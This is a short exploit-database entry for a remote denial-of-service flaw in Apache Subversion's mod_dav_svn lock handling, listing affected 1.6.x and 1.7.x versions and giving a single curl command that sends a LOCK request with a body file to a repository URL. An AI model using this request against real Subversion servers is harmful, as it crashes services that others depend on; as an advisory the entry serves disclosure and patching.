Apache Subversion 1.6.x - mod_dav_svnlock.c Remote Denial of Service

2013-04-05T00:00:00
ID EXPLOITPACK:D9DA533192A7B948AEDB2BA823843E7A
Type exploitpack
Reporter anonymous
Modified 2013-04-05T00:00:00

Description

Apache Subversion 1.6.x - mod_dav_svnlock.c Remote Denial of Service

                                        
                                            source: https://www.securityfocus.com/bid/58897/info

Apache Subversion is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions.

Apache Subversion versions 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 are vulnerable. 

curl -X LOCK --data-binary @lock_body 'http://www.example.com/repo/foo'